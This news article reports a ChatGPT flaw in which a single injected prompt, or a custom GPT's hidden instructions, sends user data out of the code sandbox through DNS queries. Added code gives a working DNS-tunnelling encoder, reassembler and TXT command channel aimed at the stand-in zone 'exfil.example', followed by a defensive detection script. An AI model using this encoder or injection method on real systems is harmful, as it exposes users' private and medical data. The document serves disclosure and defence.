ChatGPT flaw let hackers steal data via DNS queries
Security researchers have disclosed a vulnerability in ChatGPT that could have allowed sensitive user data to be exfiltrated through DNS queries. OpenAI said it had already identified the underlying issue and deployed a fix.
The flaw involved ChatGPT's code execution and data analysis runtime, which is designed to block direct outbound internet access. Researchers said they found a hidden outbound route that a single malicious prompt could trigger, allowing summaries of user messages, uploaded files and model-generated assessments to be sent to an external server without visible warning or user approval.
According to the technical details, the attack relied on DNS tunnelling. Although normal outbound network requests from the isolated Linux container were blocked, DNS resolution remained available, creating a narrow communications path that could carry encoded data to attacker-controlled infrastructure. This works because a recursive resolver forwards any query it cannot answer from cache to the authoritative nameserver for the domain being asked about: if that domain belongs to the attacker, every name the sandbox resolves under it, encoded data and all, arrives at a server the attacker controls.
That meant information could leave the environment even though ChatGPT presented outbound data sharing as restricted and subject to user-facing controls. The same route could also be used to send instructions back into the container, creating remote shell access inside the code execution runtime.
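The encoding step the two paragraphs above describe, shown as an added example that is not code from the article, the researchers or OpenAI. It packs arbitrary bytes into DNS query names under a hypothetical attacker zone (`exfil.example`, the session label and the header layout are all assumptions for illustration), respecting the 63-octet label and 253-character name limits, reassembles them on the receiving side even when queries arrive out of order, duplicated or mixed with unrelated traffic, and decodes an instruction carried back in a TXT answer. No query is actually sent; the functions return the names a resolver would be asked for.

```python
import base64

# Hypothetical attacker-controlled zone, constructed for this example.
ATTACKER_DOMAIN = "exfil.example"
MAX_LABEL = 63   # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253   # practical limit for a presentation-format name (255 on the wire)


def _b32(data: bytes) -> str:
    # base32 uses only [A-Z2-7], which survives DNS case folding; padding is
    # dropped because the decoder can restore it from the length.
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def _data_char_budget(session: str, domain: str) -> int:
    # Base32 characters that fit in one name after the 8-char header label
    # (seq + total as hex) and the ".<session>.<domain>" suffix, counting the
    # dots between data labels.
    avail = MAX_NAME - 9 - len(f".{session}.{domain}")
    chars = 0
    while avail >= 1:
        take = min(MAX_LABEL, avail)
        chars += take
        avail -= take + 1
    return chars


def encode_queries(session: str, payload: bytes, domain: str = ATTACKER_DOMAIN) -> list[str]:
    """Return the query names that would carry `payload` out, one per chunk.
    Layout: <seq><total>.<data labels>.<session>.<domain>, seq/total as 4 hex digits."""
    chunk_bytes = _data_char_budget(session, domain) * 5 // 8   # base32: 5 bytes -> 8 chars
    chunks = [payload[i:i + chunk_bytes] for i in range(0, len(payload), chunk_bytes)] or [b""]
    total = len(chunks)
    if total > 0xFFFF:
        raise ValueError("payload too large for 16-bit sequence numbers")
    names = []
    for seq, chunk in enumerate(chunks):
        enc = _b32(chunk)
        labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
        name = ".".join([f"{seq:04x}{total:04x}", *labels, session, domain])
        # In the sandbox, any resolving call (e.g. socket.getaddrinfo(name, 0))
        # would hand this string to the recursive resolver. Not done here.
        assert len(name) <= MAX_NAME and all(len(l) <= MAX_LABEL for l in name.split("."))
        names.append(name)
    return names


def reassemble(query_names, session: str, domain: str = ATTACKER_DOMAIN) -> bytes:
    """Attacker-side reconstruction from the names seen by the authoritative server.
    Tolerates out-of-order delivery, duplicates and unrelated queries."""
    suffix = f".{session}.{domain}"
    chunks, total = {}, None
    for name in query_names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue                                   # noise: some other query
        head, *labels = name[:-len(suffix)].split(".")
        if len(head) != 8 or any(c not in "0123456789abcdef" for c in head):
            continue
        seq, tot = int(head[:4], 16), int(head[4:], 16)
        if total is None:
            total = tot
        elif tot != total:
            continue
        chunks[seq] = _unb32("".join(labels))          # duplicates simply overwrite
    if total is None or len(chunks) != total:
        missing = sorted(set(range(total or 0)) - chunks.keys())
        raise ValueError(f"incomplete transfer, missing chunks {missing}")
    return b"".join(chunks[i] for i in range(total))


def encode_instruction(cmd: bytes) -> str:
    # What the attacker's nameserver would place in a TXT answer to drive the
    # sandbox from outside; "v=" is an assumed marker, not a real convention.
    return "v=" + _b32(cmd)


def decode_instruction(txt: str) -> bytes:
    if not txt.startswith("v="):
        raise ValueError("not an instruction record")
    return _unb32(txt[2:])


# Constructed sample resembling the proof-of-concept scenario; not real data.
SAMPLE_SUMMARY = b"patient: Jane Doe, 42; assessment: likely iron deficiency"

if __name__ == "__main__":
    for n in encode_queries("s1", SAMPLE_SUMMARY):
        print(len(n), n)
    print(reassemble(encode_queries("s1", SAMPLE_SUMMARY), "s1"))
```

With a 17-character suffix each name carries 140 bytes, so the sample summary fits in a single query; a 768-byte document takes six. The point for defenders is that every one of those names is a perfectly valid query, which is why "block outbound traffic but keep DNS" is not an egress control.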
How It Worked
The reported attack began with a malicious prompt inserted into an otherwise ordinary conversation. From that point, each subsequent exchange could become a source of leakage, depending on how the prompt directed the model to process the material.
The leaked data could include raw text supplied by the user, information extracted from uploaded documents or conclusions generated by the system itself. Researchers argued that this increased the attack's value because it could target both source material and the condensed outputs derived from it.
One scenario described a malicious prompt disguised as a productivity aid. Another involved prompts framed as a way to unlock premium features on lower-tier accounts, giving attackers a social engineering hook to persuade users to paste long or unusual instructions into a chat.
The risk was broader in custom GPTs, where the same logic could be embedded in the assistant's instructions or files. In that case, a user would only need to open the GPT and interact with it normally while the hidden mechanism extracted selected information in the background.
The researchers illustrated that point with a proof of concept in which a GPT acted as a personal doctor. In that test, they said a user uploaded lab results containing identifying details, asked for help interpreting the document and received a medical assessment in what appeared to be an ordinary exchange. At the same time, according to the researchers, the attacker's server received the patient's identity and the model's assessment.
Industry Response
David Brauchler, technical director and head of AI and ML security at NCC Group, said the case reflected an older class of security problem reappearing in AI systems.
"This attack uses DNS side-channels, a long-standing element of threat actor tradecraft. Vulnerabilities that leak information or compromise functionality through DNS are abundant in web applications, demonstrating that traditional application vulnerabilities remain relevant in the AI space and, in fact, become amplified when chained with AI features. The threat landscape is evolving to include combinations of both application flaws and data-oriented risks that the industry has not had to contend with before."
"OpenAI is patching this vulnerability, but organisations should ensure they continue regular security testing of their own AI-powered applications, because most AI environments inadvertently introduce dozens of vulnerabilities just like this one, with a much lower barrier to exploitation. Without ongoing security assessments, these flaws will lurk just below the surface of production applications, as our NCC Group AI Red Team has commonly observed," Brauchler said.
Broader Questions
The incident highlights how AI assistants have moved beyond text generation into environments that can run code, inspect files and connect with external services while handling medical, financial and legal information. Those features create more potential paths for sensitive data to cross system boundaries.
In normal use, ChatGPT's external actions are designed to show users when information is about to be sent to third-party services and to ask for approval. Researchers said the DNS channel sat outside that model: the system did not treat the queries as an external transfer requiring consent, so the activity was neither surfaced to the user nor blocked.
They also argued that the issue showed how legacy internet mechanisms, such as DNS, can become weak points in newer AI environments. A platform may block conventional network access while still exposing enough infrastructure for data to be encoded, transmitted and reconstructed elsewhere.
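The encoded-and-transmitted pattern described above is also what makes this kind of channel detectable at the resolver, whether or not the platform ever intended DNS as an egress path. The following is an added example, not code from the article or from any vendor named in it. It runs a simple DNS-tunnelling heuristic over constructed resolver log lines (the log format, the client addresses, the `exfil.example` zone and the thresholds are all assumptions): for each client and registered domain it counts distinct query names and their average length, and reports the entropy of the subdomain part and a rough estimate of how many bytes the subdomains could have carried.

```python
import math
import re
from collections import defaultdict

# Assumed log format, constructed for this example.
LOG_RE = re.compile(r"^(?P<ts>\S+) client=(?P<client>\S+) type=(?P<qtype>\S+) name=(?P<name>\S+)$")


def shannon_entropy(text: str) -> float:
    """Bits per character; random base32 sits near 5, ordinary hostnames well below 4."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(name: str) -> str:
    # Naive: last two labels. Production code should use the Public Suffix List
    # so that names under e.g. "co.uk" are grouped correctly.
    return ".".join(name.rstrip(".").split(".")[-2:])


def analyse(lines, min_unique: int = 5, min_avg_len: int = 50) -> list[dict]:
    """Flag (client, domain) pairs with many distinct, unusually long query names."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        name = m["name"].lower().rstrip(".")
        seen[(m["client"], registered_domain(name))].add(name)

    findings = []
    for (client, apex), names in seen.items():
        prefixes = [n[:-(len(apex) + 1)] if len(n) > len(apex) else "" for n in names]
        avg_len = sum(len(n) for n in names) / len(names)
        if len(names) >= min_unique and avg_len >= min_avg_len:
            findings.append({
                "client": client,
                "domain": apex,
                "unique_names": len(names),
                "avg_name_len": round(avg_len, 1),
                "avg_prefix_entropy": round(sum(map(shannon_entropy, prefixes)) / len(prefixes), 2),
                # if the prefixes were base32, this is roughly the payload they could carry
                "est_payload_bytes": sum(len(p) for p in prefixes) * 5 // 8,
            })
    return sorted(findings, key=lambda f: f["est_payload_bytes"], reverse=True)


# Constructed sample log: one sandbox host tunnelling under exfil.example,
# plus ordinary lookups (including a burst of short CDN names that should NOT fire).
_TUNNEL_LABEL = "mfrggzdfmztwq2lknnwg23tpobyxe43uoj2w4zjaozwk4zleovzs4llogq3d"  # 60 base32-looking chars
SAMPLE_LOG = [
    "2025-01-10T09:00:00Z client=10.0.0.5 type=A name=www.example.com",
    "2025-01-10T09:00:01Z client=10.0.0.5 type=A name=www.example.com",
    "2025-01-10T09:00:02Z client=10.0.0.5 type=AAAA name=updates.example.org",
    "2025-01-10T09:00:03Z client=10.0.0.7 type=A name=ec2-203-0-113-9.compute.example.net",
] + [
    f"2025-01-10T09:00:1{i}Z client=10.0.0.7 type=A name=cdn{i}.example.com" for i in range(1, 7)
] + [
    f"2025-01-10T09:00:2{i}Z client=10.0.0.5 type=A "
    f"name={i:04x}0006.{_TUNNEL_LABEL}.{_TUNNEL_LABEL[::-1]}.s1.exfil.example"
    for i in range(6)
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f)
```

The two gates (distinct-name count and average length) are deliberately crude so the result is easy to reason about; in practice the entropy and estimated-volume fields are what an analyst uses to rank hits, and thresholds must be tuned against a site's own baseline, since CDNs, anti-spam lookups and some telemetry legitimately produce many long, high-entropy names.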
For corporate users, the case is likely to sharpen scrutiny of AI tools that process internal documents or customer records. Many businesses are building assistants that review contracts, support service teams, or analyse uploaded files, and security specialists have repeatedly warned that these workflows require the same testing discipline as conventional web applications.
Brauchler urged organisations to keep testing their own systems because "most AI environments inadvertently introduce dozens of vulnerabilities just like this one, with a much lower barrier to exploitation."